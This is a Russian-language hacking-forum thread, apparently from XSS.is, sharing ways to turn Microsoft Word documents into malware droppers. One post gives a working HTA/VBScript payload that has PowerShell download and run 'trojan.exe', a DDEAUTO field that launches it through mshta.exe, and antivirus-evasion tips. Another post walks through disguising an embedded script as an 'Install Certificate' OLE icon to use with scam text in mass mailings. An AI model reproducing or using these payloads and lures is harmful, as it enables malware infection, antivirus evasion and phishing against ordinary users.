• XSS.stack #1 – первый литературный журнал от юзеров форума

Видео разводка Microsoft Word

xrahitel

(L1) cache
Пользователь
Регистрация
29.04.2014
Сообщения
847
Реакции
1 368
Всем п/т кто не читает новости тыц.


dont work in office 2007 for old version
biggrin.png



p.s Автор не я просто спиздил как всегда в наглую и тестил сегодня в office 2016 код думаю Вы так поняли где взять побаловаться
495-1.gif


 
Пожалуйста, обратите внимание, что пользователь заблокирован
Я думал это твои видяшки. Кстати, это не имеет отношения к веб уязвимостям, надо тут навести порядок. П.С. Я ещё вот что скажу, я тут модерил этот раздел, Ну, вы поняли намёк
 
первое видео от автора скрипта,остальные все мои просто не люблю присваивать себе чей-то труд по этому всегда пишу
495-1.gif




 
Для того чтобы выполнить любой VBS код через Office Exploit, нам поможет утилита mshta.exe

mshta.exe – что это такое и какой вред компьютеру может нанести:
HTML:
<html>
<body>
<script language=vbscript>
createobject("Wscript.Shell").run "powershell.exe -C (New-Object Net.WebClient).DownloadFile('your link to file', (Get-ChildItem env:\userprofile).value+'\trojan.exe'); Invoke-Expression $env:userprofile\'trojan.exe'", 0
</script>
</body>
</html>

1.В нашем случаи, этот VBS код скачивает и запускает trojan.exe, через команду powershell
2.В вашем случаи, вы можете использовать любой VBS код


Далее наш текстовый документ нужно переименовать в exploit.hta, обратите внимание что расширение файла должно быть .hta

Загружаем наш exploit.hta на файлообменник с прямой ссылкой (Если ссылка длинная то лучше её укоротить)

Далее открываем Microsoft World, и делаем как на скриншоте:

40Kad5hgif_2080838_31037186.gif


Код для эксплуатации с вашей прямой ссылкой на файл exploit.hta:
HTML:
DDEAUTO C:\\windows\\System32\\mshta.exe "your link to file .hta"

Сохраняем это всё в формате .doc

Чтобы убрать детекты AV, откройте файл в Hex редакторе и сделайте как на стриншоте:

jyMZ1Kugif_1771159_31037193.gif


© copyright
 
Безмакросный вектор атаки на Office., Просто, бюджетно и эффективно

Вступление:
Как мы все знаем Microsoft Office является одним из самых уязвимых и в то же время самым востребованным программным комплексом в мире, существуют 3 основных вектора атак на Office:

- Эксплоиты - разного рода уязвимости (buffer overflow, etc.).

- Макросы - VBA код выполняемый зачастую при запуске Word документа. У большинства пользователей отключен, для «мотивации включения» используются scam шаблоны.

- OLE Objects - То, что мы сегодня и рассмотрим, о нем детальнее ниже в статьи.

Каждый из способов имеет свои преимущества и недостатки, и каждый заслуживает внимания. Сегодня же мы рассмотрим OLE, кратко, что это такое:

OLE (Object Linking and Embedding) - технология позволяющая использовать данные с одной программы в другой, банальный пример - Таблица Excel в Word.Один из плюсов технологии - поддержка большинством версий Office.

Инструментарий:

Ну, что же, приступим, для работы нам понадобиться:

1. Операционная система семейства Windows, версия значения не имеет.
2. Microsoft Office (Подойдет конечно и Word, но не будет возможности использовать в PowerPoint, Excel).
3. JS/WSF/VB скрипты (Я думаю вы знаете где их взять
36gif_5947845_29246622.gif
), можно и использовать Ваш файл сразу, но при массовых рассылках, и подобных способах распространений - его на долго не хватит.
4. ICO картинку для нашего файла, используется для большей восприимчивости пользователем.


В конце статьи я приложу тестовый файл JS, иконку, а так же тестовый файл DOC, который получится в итоге.

Практическое руководство с комментариями:

Рассматривать и комментировать мы будем используя среду Microsoft Word 2007, заранее конфигурировать будем под легенду, допустим «Установка сертификата». Создаем новый документ Word и перетягиваем наш JS файл во внутрь Word документа:

image.png


image.png


В результате мы добавили Object, при клике на него увидим предупреждение, после заветное сообщение smile.gif. Но смотрится это весьма не презентабельно и нам вряд ли удастся заставить человека нажать и запустить наш скрипт. Да-бы изменить это, нам нужно конвертировать объект, для этого мы нажимаем правой кнопкой:

image.png



В подменю видим кнопку Convert, нажимаем и открывается новое окно:

image.png


Теперь нам нужно изменить изображение (иконку) для нашей кнопки сертификата, кликаем на «Display as icon», дальше «Change Icon…», и выбираем наше изображение, после вы увидите еще одно подменю, где в Caption нужно указать уже имя которое будет отображено под картинкой сертификата, пусть это будет «Install Certificate»:

image.png


Нажимаем «OK», дальше еще «OK» и видим готовый объект с нашей иконкой и подписью, ресайзим по желанию, а так же вводим свой scam текст:

image.png



Все, готово, как видите используя все эти маленькие хитрости мы можем создавать очень красочные scam страницы.



© copyright
 


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх